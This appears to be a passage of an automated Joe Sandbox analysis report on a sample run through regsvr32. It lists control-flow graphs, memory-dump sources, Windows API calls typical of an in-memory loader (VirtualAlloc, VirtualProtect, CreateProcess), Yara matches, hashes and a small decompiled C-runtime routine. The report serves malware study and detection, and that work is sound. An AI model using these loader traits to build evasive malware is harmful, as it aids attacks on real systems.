                                                  control_flow_graph 15 2c0000-2c0460 call 2c0aa8 * 2 VirtualAlloc 37 2c048a-2c0494 15->37 38 2c0462-2c0466 15->38 41 2c049a-2c049e 37->41 42 2c0a91-2c0aa6 37->42 39 2c0468-2c0488 38->39 39->37 39->39 41->42 43 2c04a4-2c04a8 41->43 43->42 44 2c04ae-2c04b2 43->44 44->42 45 2c04b8-2c04bf 44->45 45->42 46 2c04c5-2c04d2 45->46 46->42 47 2c04d8-2c04e1 46->47 47->42 48 2c04e7-2c04f4 47->48 48->42 49 2c04fa-2c0507 48->49 50 2c0509-2c0511 49->50 51 2c0531-2c0567 GetNativeSystemInfo 49->51 52 2c0513-2c0518 50->52 51->42 53 2c056d-2c0589 VirtualAlloc 51->53 54 2c051a-2c051f 52->54 55 2c0521 52->55 56 2c058b-2c059e 53->56 57 2c05a0-2c05ac 53->57 59 2c0523-2c052f 54->59 55->59 56->57 58 2c05af-2c05b2 57->58 61 2c05b4-2c05bf 58->61 62 2c05c1-2c05db 58->62 59->51 59->52 61->58 63 2c05dd-2c05e2 62->63 64 2c061b-2c0622 62->64 65 2c05e4-2c05ea 63->65 66 2c0628-2c062f 64->66 67 2c06db-2c06e2 64->67 68 2c05ec-2c0609 65->68 69 2c060b-2c0619 65->69 66->67 70 2c0635-2c0642 66->70 71 2c06e8-2c06f9 67->71 72 2c0864-2c086b 67->72 68->68 68->69 69->64 69->65 70->67 75 2c0648-2c064f 70->75 76 2c0702-2c0705 71->76 73 2c0917-2c0929 72->73 74 2c0871-2c087f 72->74 77 2c092f-2c0937 73->77 78 2c0a07-2c0a1a 73->78 79 2c090e-2c0911 74->79 80 2c0654-2c0658 75->80 81 2c06fb-2c06ff 76->81 82 2c0707-2c070a 76->82 86 2c093b-2c093f 77->86 96 2c0a1c-2c0a27 78->96 97 2c0a40-2c0a4a 78->97 79->73 85 2c0884-2c08a9 79->85 87 2c06c0-2c06ca 80->87 81->76 83 2c070c-2c071d 82->83 84 2c0788-2c078e 82->84 88 2c071f-2c0720 83->88 89 2c0794-2c07a2 83->89 84->89 117 2c08ab-2c08b1 85->117 118 2c0907-2c090c 85->118 93 2c09ec-2c09fa 86->93 94 2c0945-2c095a 86->94 91 2c06cc-2c06d2 87->91 92 2c065a-2c0669 87->92 95 2c0722-2c0784 88->95 98 2c085d-2c085e 89->98 99 2c07a8 89->99 91->80 100 2c06d4-2c06d5 91->100 104 2c067a-2c067e 92->104 105 2c066b-2c0678 92->105 93->86 106 2c0a00-2c0a01 93->106 102 2c095c-2c095e 94->102 103 2c097b-2c097d 94->103 95->95 112 2c0786 95->112 113 2c0a38-2c0a3e 96->113 115 2c0a4c-2c0a54 97->115 116 2c0a7b-2c0a8e 97->116 98->72 114 2c07ae-2c07d4 99->114 100->67 119 2c096e-2c0979 102->119 120 2c0960-2c096c 102->120 108 2c097f-2c0981 103->108 109 2c09a2-2c09a4 103->109 110 2c068c-2c0690 104->110 111 2c0680-2c068a 104->111 107 2c06bd-2c06be 105->107 106->78 107->87 124 2c0989-2c098b 108->124 125 2c0983-2c0987 108->125 129 2c09ac-2c09bb 109->129 130 2c09a6-2c09aa 109->130 127 2c06a5-2c06a9 110->127 128 2c0692-2c06a3 110->128 126 2c06b6-2c06ba 111->126 112->89 113->97 121 2c0a29-2c0a35 113->121 142 2c0835-2c0839 114->142 143 2c07d6-2c07d9 114->143 115->116 122 2c0a56-2c0a78 115->122 116->42 131 2c08bb-2c08c8 117->131 132 2c08b3-2c08b9 117->132 118->79 123 2c09be-2c09bf 119->123 120->123 121->113 122->116 140 2c09c5-2c09cb 123->140 124->109 138 2c098d-2c098f 124->138 125->123 126->107 127->107 139 2c06ab-2c06b3 127->139 128->126 129->123 130->123 134 2c08ca-2c08d1 131->134 135 2c08d3-2c08e5 131->135 133 2c08ea-2c08fe 132->133 133->118 153 2c0900-2c0905 133->153 134->134 134->135 135->133 144 2c0999-2c09a0 138->144 145 2c0991-2c0997 138->145 139->126 146 2c09cd-2c09d3 140->146 147 2c09d9-2c09e9 VirtualProtect 140->147 151 2c083b 142->151 152 2c0844-2c0850 142->152 149 2c07db-2c07e1 143->149 150 2c07e3-2c07f0 143->150 144->140 145->123 146->147 147->93 154 2c0812-2c082c 149->154 155 2c07fb-2c080d 150->155 156 2c07f2-2c07f9 150->156 151->152 152->114 157 2c0856-2c0857 152->157 153->117 154->142 159 2c082e-2c0833 154->159 155->154 156->155 156->156 157->98 159->143
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.936357539.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2c0000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                                  • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                  • API String ID: 2313188843-2517549848
                                                  • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                  • Instruction ID: 8ba112336fca9ef7a8b35a4b59e0e013f0f36789ae3b83468f658d617256cfb9
                                                  • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                  • Instruction Fuzzy Hash: 1A72C630628B49CBDB29DF18C885BB9B7E1FB98305F10472DE88AD7211DB34D956CB85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.937056272.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                  • Associated: 00000005.00000002.937052762.000007FEF7530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.937070765.000007FEF7552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.937081290.000007FEF755B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.937086378.000007FEF755F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Pointer$Decode$_initterm$EncodeExitProcess__crt
                                                  • String ID:
                                                  • API String ID: 3799933513-0
                                                  • Opcode ID: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                  • Instruction ID: 50440ff04c6b651d32773591404ba5b67e5f7cae972734bbf51138f9a8de4c41
                                                  • Opcode Fuzzy Hash: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                  • Instruction Fuzzy Hash: B751EC72E3DA8685E6D09B14E48432A77E5F389798F101535FA8D427B5EF3CE444CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.936929041.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID: z
                                                  • API String ID: 963392458-1375040831
                                                  • Opcode ID: 044b6e1ce48cfd18270e48a4d1ffa5fa37b68dcc1aa27e33fe08f1a26b59e50a
                                                  • Instruction ID: 5490f85ef4092ec497088e60b932e525f0ce693db587fe3a551d92928695aba5
                                                  • Opcode Fuzzy Hash: 044b6e1ce48cfd18270e48a4d1ffa5fa37b68dcc1aa27e33fe08f1a26b59e50a
                                                  • Instruction Fuzzy Hash: 5141C27191C7848FD7A5DF18D08A7DAB7E0FB98318F01495DE88CC7292DB749885CB46
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.936929041.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID: z
                                                  • API String ID: 963392458-1375040831
                                                  • Opcode ID: 274a6825be770f02a4f82c9f6cbe831b28a77f7637ef6bb2e3a1323e28db6850
                                                  • Instruction ID: 90d0215384d3738c1bd812602d16852eefab8a4974bd8bae5625081230a7a3ff
                                                  • Opcode Fuzzy Hash: 274a6825be770f02a4f82c9f6cbe831b28a77f7637ef6bb2e3a1323e28db6850
                                                  • Instruction Fuzzy Hash: 4741377091CB848BD7B4DF18D08A7AAB7E0FB98315F10495EE88CC3252DB7498848B86
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.937056272.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                  • Associated: 00000005.00000002.937052762.000007FEF7530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.937070765.000007FEF7552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.937081290.000007FEF755B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.937086378.000007FEF755F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer_initterm_e
                                                  • String ID: Y
                                                  • API String ID: 1618838664-1754117475
                                                  • Opcode ID: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                  • Instruction ID: 8d17ab7a58495d8069f622c6c8970338df7fec2bda78b20ca1d94b3edb2a395b
                                                  • Opcode Fuzzy Hash: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                  • Instruction Fuzzy Hash: 3DE0A561E3C14297E6E5AB20EC803B927E2B794348F400931F94D4A8B5EB3DE905CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E000007FE7FEF7534399(long long __rax, long long _a48, intOrPtr _a80, intOrPtr _a88, void* _a120) {
                                                  
                                                  				_a48 = __rax;
                                                  				if (_a48 == 0) goto 0xf75343ad;
                                                  				goto 0xf75343f5;
                                                  				if (_a88 != 0) goto 0xf75343ce;
                                                  				if (_a120 == 0) goto 0xf75343c7;
                                                  				 *_a120 = 0xc;
                                                  				goto 0xf75343f5;
                                                  				if (E000007FE7FEF753ABB0(_a48, _a80) != 0) goto 0xf75343f3;
                                                  				if (_a120 == 0) goto 0xf75343ef;
                                                  				 *_a120 = 0xc;
                                                  				goto 0xf75343f5;
                                                  				goto 0xf7534377;
                                                  				return 0;
                                                  			}



                                                  0x7fef7534399
                                                  0x7fef75343a4
                                                  0x7fef75343ab
                                                  0x7fef75343b2
                                                  0x7fef75343ba
                                                  0x7fef75343c1
                                                  0x7fef75343cc
                                                  0x7fef75343da
                                                  0x7fef75343e2
                                                  0x7fef75343e9
                                                  0x7fef75343f1
                                                  0x7fef75343f3
                                                  0x7fef75343f9

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.937056272.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                  • Associated: 00000005.00000002.937052762.000007FEF7530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.937070765.000007FEF7552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.937081290.000007FEF755B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.937086378.000007FEF755F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                  • Instruction ID: f59c66b49deb2d2b3ece59ad2b01622829c0b8c50141bff4275200efde8df140
                                                  • Opcode Fuzzy Hash: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                  • Instruction Fuzzy Hash: 48018726A2C749C6F6D08A15E44473AA7E1F3847D4F101135FE8D87BB8DB7CE480CA00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _ioterm.LIBCMTD ref: 000007FEF7533437
                                                    • Part of subcall function 000007FEF7537D00: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF753343C), ref: 000007FEF7537D93
                                                    • Part of subcall function 000007FEF7533E00: FlsFree.KERNEL32 ref: 000007FEF7533E13
                                                    • Part of subcall function 000007FEF7533E00: _mtdeletelocks.LIBCMTD ref: 000007FEF7533E23
                                                    • Part of subcall function 000007FEF75388D0: HeapDestroy.KERNELBASE ref: 000007FEF75388DB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.937056272.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                  • Associated: 00000005.00000002.937052762.000007FEF7530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.937070765.000007FEF7552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.937081290.000007FEF755B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.937086378.000007FEF755F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: CriticalDeleteDestroyFreeHeapSection_ioterm_mtdeletelocks
                                                  • String ID:
                                                  • API String ID: 1508997487-0
                                                  • Opcode ID: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                                  • Instruction ID: 0709412b6044a56b86e050daf6e123306acf1d940542bdba759049c97d51ab2e
                                                  • Opcode Fuzzy Hash: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                                  • Instruction Fuzzy Hash: 06E067A1F3C0079AF2D5676498823B91AD39B447C5F810879790EC62F3EA7DB8115661
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%